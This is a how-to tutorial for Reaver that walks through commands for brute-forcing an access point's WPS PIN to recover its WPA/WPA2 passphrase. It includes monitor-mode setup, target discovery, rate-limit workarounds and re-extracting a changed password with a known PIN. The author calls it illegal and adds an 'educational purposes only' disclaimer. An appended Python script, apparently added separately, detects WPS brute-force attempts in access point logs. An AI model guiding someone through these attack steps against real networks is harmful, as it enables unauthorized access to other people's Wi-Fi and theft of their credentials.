Reaver
What is Reaver?
Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
How do I use this tool?
As said above, just follow this tutorial :)
NOTE: Reaver doesn't need any dictionary files!
First, type:
airmon-ng
As said earlier, this shows you your wireless card's name.
I'll use wlan0
We need to put the wireless card into monitor mode, so type:
airmon-ng start wlan0
After that, type:
airodump-ng mon0
Now, copy the BSSID of the target AP.
Press CONTROL+c to cancel
To see the APs that are vulnerable to WPS attacks, type:
wash -i mon0
If the target AP is vulnerable, it should say:
WPS Locked: No
Now, to start the attack, type:
reaver -i mon0 -b [BSSID] -vv
Now, you'll need to wait around 2-10 hours.
If the AP is limiting you with a message saying:
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying
and if Reaver says that it is trying the same PIN over and over, press CONTROL+c to cancel, then type:
reaver --help
This will show you the help menu; you can start playing with the options that you have.
I usually add: -c -S -L
reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv
This one works great for me, so keep playing with the options until it works!
When it reaches 100% it should give you some lines; the password is the one after:
WPS PSK: 'PASSWORD HERE'
And here it is!
You should also remember the PIN.
WPS PIN: PIN HERE
Now, let's say that for some reason the router's owner changed the password for his Wi-Fi.
Since you already have the pin, type:
reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
And it should give you the password in a matter of seconds!
Note: This is illegal and is for educational purposes only. Any loss/damage happening will not be in any way our responsibility.
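The defender's side of the rate limiting and "WPS Locked" behaviour mentioned above, as an added example that is not part of the original tutorial or of Reaver: a Python script that flags bursts of failed WPS PIN attempts in an access point's log. The log lines are constructed, their layout is an assumption modelled on hostapd's WPS-FAIL and WPS-AP-SETUP-LOCKED events, and detect_wps_bruteforce is a hypothetical name.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Constructed sample log (not captured from a real AP). The event names follow
# hostapd's WPS-FAIL / WPS-AP-SETUP-LOCKED events; the line layout is assumed.
SAMPLE_LOG = """\
2024-05-01T10:00:00 wlan0: WPS-FAIL msg=8 config_error=18
2024-05-01T10:00:04 wlan0: WPS-FAIL msg=8 config_error=18
2024-05-01T10:00:09 wlan0: WPS-FAIL msg=8 config_error=18
2024-05-01T10:00:13 wlan0: WPS-AP-SETUP-LOCKED
2024-05-01T10:01:15 wlan0: WPS-FAIL msg=8 config_error=18
2024-05-01T10:01:19 wlan0: WPS-FAIL msg=8 config_error=18
2024-05-01T11:30:00 wlan1: WPS-FAIL msg=8 config_error=18
""".splitlines()

LINE_RE = re.compile(r"^(\S+) (\S+): (WPS-FAIL|WPS-AP-SETUP-LOCKED)\b")

def detect_wps_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (timestamp, interface, reason) tuples.

    Failures are counted per AP interface, not per client MAC, because a
    client can change its MAC address between attempts.
    """
    recent = {}   # interface -> deque of recent WPS-FAIL timestamps
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.fromisoformat(m.group(1))
        iface, event = m.group(2), m.group(3)
        if event == "WPS-AP-SETUP-LOCKED":
            alerts.append((ts, iface, "AP locked WPS after repeated PIN failures"))
            continue
        q = recent.setdefault(iface, deque())
        q.append(ts)
        while ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) == threshold:     # fires when the window count hits the threshold
            alerts.append((ts, iface, f"{threshold} WPS failures within {window}"))
    return alerts

if __name__ == "__main__":
    for ts, iface, reason in detect_wps_bruteforce(SAMPLE_LOG):
        print(ts.isoformat(), iface, reason)
```

Where the AP allows it, turning off WPS PIN registration removes the exposure this detects.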